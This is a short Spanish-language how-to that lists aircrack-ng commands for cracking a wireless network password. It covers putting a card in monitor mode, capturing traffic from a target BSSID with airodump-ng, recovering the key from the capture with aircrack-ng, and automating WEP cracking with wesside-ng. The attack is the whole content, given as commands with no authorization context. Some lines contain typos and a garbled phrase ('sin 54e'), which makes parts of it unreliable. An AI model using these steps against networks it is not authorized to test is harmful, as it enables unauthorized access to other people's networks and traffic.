1. En Linux, instalar el paquete aircrack-ng.
2. Ejecutar iwconfig para saber las interfaces wifi.
3. airdriver-ng support indica si la tarjeta es compatible.
4. iwconfig wlan0 mode monitor, pone la tarjeta wlan0 en modo captura.
5. airmon-ng start wlan0, indica el modo en el que está la tarjeta (si está ocupada dirá que procesos la están utilizando).
6. airodump-ng wlan0, busca canales posibles.
7. airodump-ng -C [canal] –bssid [mac] -w [fichero] wlan0, guarda en el fichero muestras del tráfico de red. Fíjate, el segundo parámetro es con dos guiones.
8. aircrack-ng –b [mac] [fichero].cap intenta subsacar el password de red.

Ejemplos de los últimos comandos:

airodump-ng -C 7 --bssid 00:1A:2B:08:4F:14 -w file wlan0
aircrack-ng -b 00:1A:2B:08:4F:14 file-01.cap

Puede que el primer parámetro del airodump-ng sea una c minúscula.

• Fácilmente se consiguen crackear las redes con cifrado WEP sin 54e.
• Documento inicial.
• En Ubuntu, con simplemente desactivar la wifi en el NetworkManager ya desactivarías la wifi.
• Mientras más paquetes data recibas, más sencillo será crackear la wifi.

• Existe otra herramienta que realiza el proceso automáticamente, es la wesside-ng:

# airmon-ng start wlan0
# wesside-ng -i wlan0